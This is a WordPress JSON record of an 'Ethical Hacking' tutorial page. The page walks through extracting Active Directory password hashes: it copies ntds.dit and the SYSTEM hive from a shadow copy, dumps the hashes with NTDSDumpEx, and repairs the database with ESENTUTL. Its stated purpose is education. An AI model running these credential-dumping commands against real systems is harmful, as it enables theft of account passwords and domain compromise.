{"id":343,"date":"2024-05-20T14:04:34","date_gmt":"2024-05-20T14:04:34","guid":{"rendered":"https:\/\/people.utm.my\/abdulghafar\/?page_id=343"},"modified":"2025-04-18T01:27:36","modified_gmt":"2025-04-18T01:27:36","slug":"crack-microsoft-active-directory-user-password-with-ntdsdumpex","status":"publish","type":"page","link":"https:\/\/people.utm.my\/abdulghafar\/crack-microsoft-active-directory-user-password-with-ntdsdumpex\/","title":{"rendered":"Ethical Hacking 4: Cracking Active Directory User Password"},"content":{"rendered":"\n

Disclaimer: <\/strong>This article is suitable for intermediate and expert users and only for education.<\/strong><\/p>\n\n\n\n

    \n
  1. copy NTDS database using the following command: copy \\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\ntds\\ntds.dit \u00a0c:\\Extract\\ntds.dit<\/strong><\/li>\n\n\n\n
  2. copy SYS using the following command: reg SAVE HKLM\\SYSTEM c:\\Extract\\SYS<\/li>\n\n\n\n
  3. Copy System using the following command: \\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\SYSTEM c:\\Extract\\SYSTEM<\/strong><\/li>\n\n\n\n
  4. Gain the decrypted password using the following command: NTDSDumpEx.exe -d C:\\Extract\\ntds.dit -s C:\\Extract\\SYSTEM<\/strong><\/li>\n<\/ol>\n\n\n
    \n
    \"\"<\/figure>\n<\/div>\n\n\n

    Note<\/strong>: The process failed, and the error indicates that the database needs to be repaired.<\/p>\n\n\n\n

    5. Repair NTDS using the following command: ESENTUTL \/p C:\\Extract\\ntds.dit \/!10240\/08 \/o<\/strong><\/p>\n\n\n\n

    \"\"<\/figure>\n\n\n\n

    6. Re-execute the following command: NTDSDumpEx.exe -d C:\\Extract\\ntds.dit -s C:\\Extract\\SYSTEM<\/strong><\/p>\n\n\n\n

    \"\"<\/figure>\n\n\n\n
      \n
    1. All users and hash passwords are listed.<\/li>\n\n\n\n
    2. Three users (Administrator, far and mike) share the same hash, which indicates that the users utilize the same password. This loophole gives the hacker a clue that all users will utilize the same password.<\/li>\n\n\n\n
    3. Copy the hash value into Notepad, save it as .txt, and transfer it to the Kali Linux Virtual Machine.<\/li>\n<\/ol>\n","protected":false},"excerpt":{"rendered":"

      Disclaimer: This article is suitable for intermediate and expert users and only for education. Note: The process failed, and the error indicates that the database needs to be repaired. 5. Repair NTDS using the following command: ESENTUTL \/p C:\\Extract\\ntds.dit \/!10240\/08 \/o 6. Re-execute the following command: NTDSDumpEx.exe -d C:\\Extract\\ntds.dit -s C:\\Extract\\SYSTEM<\/p>\n","protected":false},"author":25922,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-343","page","type-page","status-publish","hentry","entry"],"_links":{"self":[{"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/pages\/343","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/users\/25922"}],"replies":[{"embeddable":true,"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/comments?post=343"}],"version-history":[{"count":19,"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/pages\/343\/revisions"}],"predecessor-version":[{"id":380,"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/pages\/343\/revisions\/380"}],"wp:attachment":[{"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/media?parent=343"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}